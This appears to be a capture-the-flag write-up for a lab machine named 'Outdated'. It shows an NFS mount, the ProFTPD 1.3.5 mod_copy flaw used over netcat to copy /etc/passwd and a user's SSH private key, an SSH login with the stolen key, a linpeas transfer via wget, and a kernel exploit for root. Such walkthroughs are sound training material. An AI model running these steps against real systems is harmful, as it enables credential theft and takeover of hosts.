Outdated
Last updated
Was this helpful?
Last updated
Was this helpful?
mkdir nmap
sudo rustscan -a 172.31.1.22 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scanFTP on port 21 and NFSat port 2049 is open.
Let's see if there's anything we can mount on NFS
showmount -e $ipAs you can see, we are allowed to mount /var/nfsbackups
Let's mount that endpoint
mkdir /tmp/test_mount
mount -t nsf 172.31.1.22:/var/nfsbackups /tmp/test_mountUpon mounting, we saw three folders but looks like they're empty.
If we will go back to the nmap scan, you will notice that the FTP is running ProFTPD 1.3.5 and if you a quick search using searchsploit, it has a file copy vulnerability
It means we can use this exploit and chain them with the NFS we have mounted. We can access almost anything we want by copying the file to the mounting point. First, let's connect to the FTP server using nc . I'll copy /etc/passwd to the mounting point since we can read the file from there.
> $nc 172.31.1.22 21
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]
> $site cpfr /etc/passwd
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/passwd
> 250 Copy successfulLooks like we have successfully copied the passwd file, and now we can access it.
Also, we can see daniel is the non-root user. We can copy daniel's ssh key to the mounting point. And if there's any private key, we can use it to log in via SSH.
> $nc 172.31.1.22 21
> 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.31.1.22]
> $site cpfr /home/daniel/.ssh/id_rsa
> 350 File or directory exists, ready for destination name
> $site cpto /var/nfsbackups/daniel_id_rsa
> 250 Copy successfulLet's try to use daniel's private SSH key to log in.
chmod +x daniel_id_rsa
ssh -i ./daniel_id_rsa daniel@172.31.1.22 We have successfully logged in as daniel. Sweet :D
First, let's transfer linpeas.sh
(base) [psdon@arch outdated]$ cd /opt/peass/linPEAS/
(base) [psdon@arch linPEAS]$ ls
builder images linpeas.sh README.md
(base) [psdon@arch linPEAS]$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... You can find the machine IP address by executing the following.
(base) [psdon@arch outdated]$ ip a | grep tun
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qle
n 500
inet 10.10.0.41/24 scope global tun0 Then transfer the script using wget
daniel@outdated:~$ wget http://10.10.0.41/linpeas.sh
--2021-09-07 14:38:02-- http://10.10.0.41/linpeas.sh
Connecting to 10.10.0.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 458110 (447K) [application/x-sh]
Saving to: `linpeas.sh'
100%[===========================================================================================================================================================================>] 458,110 335K/s in 1.3s
2021-09-07 14:38:04 (335 KB/s) - `linpeas.sh' saved [458110/458110]
daniel@outdated:~$ chmod +x linpeas.shAnd now we can run linpeas.sh
daniel@outdated:~$ ./linpeas.sh
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„ â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„
â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„
â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„ â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„
â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„
â–„ â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„
â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„
â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„ â–„â–„
â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„ â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„â–„
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli & makikvues |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop Right out of the bat, you will notice the kernel version is 3.13.0-32-generic
I found out this kernel version is vulnerable and can lead us to privilege escalation. And we can compile the exploit since gcc is installed on the target machine.
First, mirror the exploit to our local machine and transfer it to the target machine.
searchsploit -m linux/local/37292.c
mv 37292.c exploit.cCompile the exploit, and enjoy your root privilege :D
